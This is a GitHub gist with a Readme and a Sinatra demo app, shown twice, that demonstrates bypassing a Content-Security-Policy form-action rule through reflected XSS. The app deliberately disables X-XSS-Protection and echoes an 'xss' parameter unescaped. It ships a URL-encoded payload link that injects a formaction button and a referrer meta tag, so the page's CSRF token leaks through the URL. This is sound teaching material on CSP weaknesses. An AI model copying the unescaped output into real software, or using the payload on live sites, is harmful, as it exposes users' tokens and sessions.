kazu69/Readme.md

## Readme.md

      
    Raw
  

              Readme.md
            
          
    Bypassa CSP form-action XSS example

try

bundle install
bundle exec ruby app.rb

[2016-09-10 00:01:46] INFO  WEBrick 1.3.1
[2016-09-10 00:01:46] INFO  ruby 2.2.2 (2015-04-13) [x86_64-darwin15]
== Sinatra (v1.4.7) has taken the stage on 4567 for development with backup from WEBrick
[2016-09-10 00:01:46] INFO  WEBrick::HTTPServer#start: pid=26211 port=4567

open http://localhost:4567


routes
content


GET /
Bypassa CSP form-action XSS example


GET /csp_report_example/
confirmation csp report is sending


GET /apper_form_value/
html injection is the example


more


Bypassa CSP form-action och referrer
CSP: bypassing form-action with reflected XSS


## app.rb
require 'sinatra'
require 'slim'
require 'json'

before do
  headers \
    'Content-Security-Policy' => "default-src 'self'; form-action 'self'; report-uri /csp-reports/",
    'X-XSS-Protection' => '0' # 1(enable)の場合はinjectionは発火しない
end

get '/' do
  slim :index
end

# csp のエラーレポートが報告されることを確認
get '/csp_report_example/' do
  slim :unsafe
end

# injectionされるとtokenがURLパラメーターに出力
get '/apper_form_value/' do
  slim :apper_form_value
end

post '/subscribe/' do
  logger.info 'subscribed'
end

# csp report送信先
post '/csp-reports/' do
  params = JSON.parse request.body.read
  logger.info params
end

__END__

@@ layout
html
  == yield

@@ index
/ escapeしないで出力
== params['xss']
form[method="POST" action="/subscribe/" id="subscribe"]
  input[type="hidden" name="csrftoken" value="randomcsrftoken"]
  input[type="submit" value="scubscribe"]
br
| <a href="/?xss=%3Cinput%20value%3D%22Click%20Me%22%20type%3D%22submit%22%20formaction%3D%22%22%20form%3D%22subscribe%22%20formmethod%3D%22get%22%20%2F%3E%3Cinput%20type%3D%22hidden%22%20value%3D%22%3Cmeta%20name%3D%27referrer%27%20content%3D%27always%27%3E%22%3E">XSS</a>

@@ csp_report_example
form[method="POST" action="http://google.com/" id="subscribe"]
  input[type="hidden" name="csrftoken" value="randomcsrftoken"]
  input[type="submit" value="scubscribe"]

@@ apper_form_value
| <div><form action=”http://github.com/"></div>
form[method="POST" action="/subscribe/" id="subscribe"]
  input[type="hidden" name="csrftoken" value="randomcsrftoken"]
  input[type="submit" value="scubscribe"]
routes	content
GET /	Bypassa CSP form-action XSS example
GET /csp_report_example/	confirmation csp report is sending
GET /apper_form_value/	html injection is the example
	require 'sinatra'
	require 'slim'
	require 'json'

	before do
	headers \
	'Content-Security-Policy' => "default-src 'self'; form-action 'self'; report-uri /csp-reports/",
	'X-XSS-Protection' => '0' # 1(enable)の場合はinjectionは発火しない
	end

	get '/' do
	slim :index
	end

	# csp のエラーレポートが報告されることを確認
	get '/csp_report_example/' do
	slim :unsafe
	end

	# injectionされるとtokenがURLパラメーターに出力
	get '/apper_form_value/' do
	slim :apper_form_value
	end

	post '/subscribe/' do
	logger.info 'subscribed'
	end

	# csp report送信先
	post '/csp-reports/' do
	params = JSON.parse request.body.read
	logger.info params
	end

	__END__

	@@ layout
	html
	== yield

	@@ index
	/ escapeしないで出力
	== params['xss']
	form[method="POST" action="/subscribe/" id="subscribe"]
	input[type="hidden" name="csrftoken" value="randomcsrftoken"]
	input[type="submit" value="scubscribe"]
	br
	\| <a href="/?xss=%3Cinput%20value%3D%22Click%20Me%22%20type%3D%22submit%22%20formaction%3D%22%22%20form%3D%22subscribe%22%20formmethod%3D%22get%22%20%2F%3E%3Cinput%20type%3D%22hidden%22%20value%3D%22%3Cmeta%20name%3D%27referrer%27%20content%3D%27always%27%3E%22%3E">XSS</a>

	@@ csp_report_example
	form[method="POST" action="http://google.com/" id="subscribe"]
	input[type="hidden" name="csrftoken" value="randomcsrftoken"]
	input[type="submit" value="scubscribe"]

	@@ apper_form_value
	\| <div><form action=”http://github.com/"></div>
	form[method="POST" action="/subscribe/" id="subscribe"]
	input[type="hidden" name="csrftoken" value="randomcsrftoken"]
	input[type="submit" value="scubscribe"]